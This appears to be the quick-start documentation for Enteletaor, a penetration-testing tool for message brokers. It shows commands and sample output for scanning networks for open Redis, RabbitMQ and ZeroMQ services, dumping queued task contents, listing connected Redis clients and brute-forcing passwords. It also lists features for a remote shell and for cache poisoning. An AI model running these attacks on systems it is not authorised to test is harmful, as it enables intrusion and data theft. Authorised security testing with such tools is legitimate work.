Quick Start¶
Enteletaor have 3 super commands available:
- scan: Discover open brokers.
- tasks: handle remote tasks.
- redis: specific actions for Redis server.
This document contains an overview of enteletaor with some examples for each super commands. If you want learn more visit the Advanced usage.
Python versions¶
Enteletaor can run in Python 2.7.x and 3.x. Python 3 is recommended, but you can use python 2.7 without problem.
Getting help¶
Super commands tasks
and redis
has many sub-options, you can get help using -h
in each super command:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | # enteletaor scan -h
usage: enteletaor.py redis [-h]
{info,disconnect,dump,cache,discover-dbs,connected}
...
positional arguments:
{info,disconnect,dump,cache,discover-dbs,connected}
redis commands:
info open a remote shell through the Redis server
disconnect disconnect one or all users from Redis server
dump dumps all keys in Redis database
cache poison remotes cache using Redis server
discover-dbs discover all Redis DBs at server
connected get connected users to Redis server
optional arguments:
-h, --help show this help message and exit
|
Setting verbosity level¶
Enteletaor has 5 verbosity levels. You can modify level adding -v
to command line:
# enteletaor -v scan -t 10.10.0.10
# enteletaor -vvvv scan -t 10.10.0.10
Note
Be careful to put -v
between enteletaor and top action:
- enteletaor -vv scan ... -> GOOD
- enteletaor scan -vv ... -> BAD
Quick scan¶
You can try to discover if some host has open brokers running running:
# enteletaor -v scan -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Number of targets to analyze: 1
[ * ] - Starting scan
[ * ] > Analyzing host '10.10.0.10'
[ * ] <!!> Open 'RabbitMQ' server found in port '5672' at '10.10.0.10'
[ * ] <!!> Open 'Redis' server found in port '6379' at '10.10.0.10'
[ * ] <!!> Open 'ZeroMQ' server found in port '5555' at '10.10.0.10'
[ * ] - Open services found:
[ * ] -> Host - 10.10.0.10
[ * ] * 6379/TCP [Redis]
[ * ] * 5672/TCP [RabbitMQ]
[ * ] * 5555/TCP [ZeroMQ]
[ * ] Done!
Also we can analyze an entire network:
# enteletaor scan -t 10.10.0.10/24
Remote tasks¶
Listing remote tasks¶
With enteletaor you can handle remote tasks, for example, you can list pending tasks doing:
# enteletaor -v tasks list-tasks -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Remote process found:
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] Done!
Enteletaor is telling us that it has discovered a task, called tasks.send_mail
with 3 parameters, and the type of parameter by their position.
Note
The tool can’t discover the parameter name, thus indicate the position.
This task can match with this programing function, i.e:
1 2 3 4 5 6 7 8 9 10 11 12 | def send_mail(to, from, message):
"""
:param to: mail destination
:type to: str
:param from: mail sender
:type from: str
:param message: content of message
:type message: str
"""
# Code that send the e-mail
|
Dumping tasks content¶
Enteletaor not only permit us listing remote tasks, it also can dump their content:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | # enteletaor tasks raw-dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: particia@stephnie.com
[ * ] -> P1: Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: Asia and the Pacific and was already at war with the invasion of the United States emerged as rival superpowers, setting the stage for the Cold War, which lasted for the next 46 years.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: eveline@stephnie.com
[ * ] -> P1: Can You Afford?
[ * ] -> P2: Berlin by Soviet and Polish troops and the coalition of the United Kingdom and the United States and European territories in the Pacific, the Axis lost the initiative and undertook strategic retreat on all fronts.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: milford@stephnie.com
[ * ] -> P1: Hey Don't Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: European neighbours, Poland, Finland, Romania and the Axis.
[ * ] No more messages from server. Exiting...
[ * ] Done!
|
Redis¶
Redis is a powerful software, with many options, so it has a specific super command.
Getting remove Redis info¶
If you want list remote Redis server information, only type:
# enteletaor redis info -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Config for server '10.10.0.10':
[ * ] - appendonly: no
[ * ] - auto-aof-rewrite-min-size: 67108864
...
[ * ] - timeout: 0
[ * ] - databases: 16
[ * ] - slave-priority: 100
[ * ] - dir: /var/lib/redis
[ * ] Done!
Listing users¶
We can also list all connected users to Redis server. A user could be a web application (that uses Redis as cache), a monitoring system or, even, the administrator.
# enteletaor redis connected -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Connected users to '10.10.0.10':
[ * ] - 10.10.0.2:52748 (DB: 0)
[ * ] - 10.10.0.2:52749 (DB: 0)
[ * ] - 10.10.0.2:52752 (DB: 0)
[ * ] - 127.0.0.1:42262 (DB: 0)
[ * ] - 10.10.0.2:53095 (DB: 0)
[ * ] Done!
Localhost addresses usually is a local monitoring system or admin.
Brute forcer¶
Enteletaor has a module to help us to recover passwords for remote servers. Usage is so simple:
# enteletaor brute password -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Detected 'Redis' server with 'auth'.
[ * ] - Starting bruteforcer using wordlist : '/Users/Dani/Documents/Projects/enteletaor/enteletaor_lib/resources/wordlist/10_million_password_list_top_1000.txt'
[ * ] Done!